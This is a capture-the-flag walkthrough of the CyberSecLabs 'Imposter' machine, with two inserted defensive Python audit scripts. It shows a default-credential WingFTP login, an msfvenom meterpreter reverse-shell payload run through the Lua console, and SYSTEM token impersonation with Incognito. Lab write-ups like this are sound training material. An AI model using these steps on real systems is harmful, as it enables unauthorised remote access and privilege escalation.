csl-imposter-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let's play CyberSecLabs Imposter at https://www.cyberseclabs.co.uk/labs/beginner-labs

Tasks

Scanning

nmap 172.31.1.20

nmap -A 172.31.1.20
We have several ports open, however the important ones to notice here are ports 21 and 8080.  21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.

Enumeration & Exploitation

Enumeration begins with visiting the webpage, which we are able to log in to with the admin:password default credentials. This quickly moves right into exploitation.
WingFTP login screen and Dashboard
Quickly poking around reveals that we are an administrative user and are able to create an FTP user (there are currently none).

User Creation
We've created a user and granted them complete access to the file system. This is where the unintended exploit was discovered. WingFTP is running as a low privilege user; however, by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, including the Administrator directory, System32 files, etc. This is completely unintended, and after researching for some time I was unable to find anything in the wild suggesting this exploit has been discovered before. I'll be doing more research on this to determine whether it's simply a misconfiguration (which it shouldn't be, given the user permissions on the underlying machine) or an actual zero-day exploit that has not yet been discovered.
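The misconfiguration just described (an FTP account whose home directory is the drive root, with full permissions, so that Administrator and System32 become reachable over FTP) is the kind of thing a defender can catch by auditing the user definitions before anyone logs in. The following is an added example, not code from this walkthrough and not WingFTP's own configuration format or API: it models FTP user records as plain Python dicts with name, home and permissions fields (the sample records are constructed, the first one modelled on the account created above) and flags any account whose home directory is a drive root, or reaches into a sensitive system path, while holding write, delete or execute rights.

```python
"""Audit FTP user definitions for over-broad filesystem access.

Added example, not part of the original walkthrough and not WingFTP's own
configuration format or API. User records are plain dicts (a constructed
sample is below); the check is what a defender would run over an exported
user list to catch accounts whose virtual root spans the whole disk.
"""
import ntpath

# Paths that an FTP user's home directory should never contain or sit inside.
SENSITIVE_PREFIXES = (
    r"C:\Windows",
    r"C:\Users\Administrator",
    r"C:\Program Files",
)

# Permissions that turn an over-broad home directory into tampering or code execution.
WRITE_LIKE = {"write", "delete", "execute"}


def _normalize(path):
    """Windows-style normalisation: forward slashes, '..' segments, trailing separator, case."""
    return ntpath.normpath(path.replace("/", "\\")).rstrip("\\").lower()


def is_drive_root(path):
    """True for 'C:\\', 'C:/', 'D:' and similar whole-drive roots (also after '..' collapsing)."""
    p = _normalize(path)
    return len(p) == 2 and p[1] == ":"


def reaches_sensitive(path):
    """True if the home directory is a drive root, or is equal to, an ancestor of,
    or inside one of SENSITIVE_PREFIXES."""
    p = _normalize(path)
    if is_drive_root(path):
        return True
    for prefix in SENSITIVE_PREFIXES:
        q = _normalize(prefix)
        if p == q or q.startswith(p + "\\") or p.startswith(q + "\\"):
            return True
    return False


def audit_user(user):
    """Return the list of reasons an FTP user definition is risky (empty if it looks confined)."""
    reasons = []
    home = user["home"]
    perms = {x.lower() for x in user.get("permissions", ())}
    if is_drive_root(home):
        reasons.append("home directory is a drive root")
    elif reaches_sensitive(home):
        reasons.append("home directory reaches a sensitive system path")
    if reasons and perms & WRITE_LIKE:
        reasons.append("write/delete/execute granted outside a confined directory")
    return reasons


def audit_ftp_users(users):
    """Map each risky username to its reasons; confined users are omitted."""
    findings = {}
    for user in users:
        reasons = audit_user(user)
        if reasons:
            findings[user["name"]] = reasons
    return findings


# Constructed sample: the first record models the account created in the walkthrough.
SAMPLE_USERS = [
    {"name": "lian", "home": "C:/", "permissions": ["read", "write", "execute", "delete"]},
    {"name": "uploads", "home": r"C:\FTPRoot\uploads", "permissions": ["read", "write"]},
    {"name": "backup", "home": r"C:\Users\Administrator\Documents", "permissions": ["read"]},
]

if __name__ == "__main__":
    for name, reasons in audit_ftp_users(SAMPLE_USERS).items():
        print(name + ": " + "; ".join(reasons))
```

Run as-is it reports lian (drive root plus write/execute) and backup (home inside the Administrator profile) and stays silent on uploads, whose root is a dedicated directory. The path normalisation collapses `..` segments, so a home of `C:\FTPRoot\..` is caught as a drive root too. The walkthrough notes that WingFTP runs as a low-privilege user yet could still read those directories, so the NTFS ACLs on the host are worth reviewing alongside the FTP configuration: the service account is the second line of confinement when the virtual root is wrong.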
Now back to our regularly scheduled walkthrough.
We’ve now created our user, and can leverage it to gain access to the FTP service on the machine.  We’ll first need to log in to it, then create a payload with msfvenom, and can then utilize the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.
ftp 172.31.1.20 login

User lian directory where we will place our exploit (notice we have RWX permissions on Administrator)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=5555 -f exe > pwn.exe

put pwn.exe file upload

Metasploit Multi Handler and Payload parameters

Reverse shell via Lua Console execution – os.execute('cmd.exe /c C://Users/lian/pwn.exe')
At this point we have Meterpreter shell access to the machine and are able to enumerate our current user.  We can do this using the win_privs module first to determine what our privileges are on the system.
run post/windows/gather/win_privs
Notice that we can Delegate and Impersonate privileges.  In order to do this, we can utilize the Incognito module in Meterpreter.
load incognito; list_tokens -u
We notice that the NT AUTHORITY\SYSTEM token is available as a delegation token, so we can take it with the impersonate_token command.
impersonate_token "NT AUTHORITY\SYSTEM"
With the token impersonated, all you have to do is snag the flags and complete the challenge.
User and Administrator Flags
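The privilege check above (win_privs, then token impersonation through Incognito) is the same check a defender should run in the other direction: a service account that holds SeImpersonatePrivilege can adopt the security context of clients that authenticate to it, which is how a SYSTEM token ends up within reach of a compromised FTP daemon, so those privileges deserve review on every account that runs a network-facing service. The following is an added example, not part of the original walkthrough: it parses the output of the standard Windows `whoami /priv` command (a constructed listing modelling a low-privilege service account is embedded inline) and reports which high-impact privileges the account holds and whether each is currently enabled. The privilege-to-risk wording is the example's own.

```python
"""Flag high-impact privileges in `whoami /priv` output.

Added example, not part of the original walkthrough. The listing below is a
constructed sample modelling a low-privilege service account; the mapping of
privilege names to risk descriptions is the example's own wording.
"""
import re

# Privileges that let a compromised service account escalate or read/write past ACLs.
HIGH_IMPACT = {
    "SeImpersonatePrivilege": "impersonate the security context of connecting clients (SYSTEM reachable)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a newly created process",
    "SeDebugPrivilege": "open and manipulate any process, including SYSTEM processes",
    "SeBackupPrivilege": "read any file regardless of ACLs",
    "SeRestorePrivilege": "write any file regardless of ACLs",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample in the layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the State column.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: (description, state)} parsed from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state)
    return privs


def high_impact_privileges(privs):
    """Return [(name, state, risk)] for held privileges in HIGH_IMPACT, enabled ones first."""
    found = [(name, privs[name][1], HIGH_IMPACT[name]) for name in HIGH_IMPACT if name in privs]
    return sorted(found, key=lambda row: row[1] != "Enabled")


def audit(text):
    """Parse and filter in one step: the high-impact privileges present in a listing."""
    return high_impact_privileges(parse_whoami_priv(text))


if __name__ == "__main__":
    for name, state, risk in audit(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {risk}")
```

A Disabled state is reported rather than ignored on purpose: a privilege that is merely disabled is still held by the token and can be switched on by the process itself, so the remediation is to remove it from the service account (or run the service under an account that was never granted it), not to rely on its disabled state.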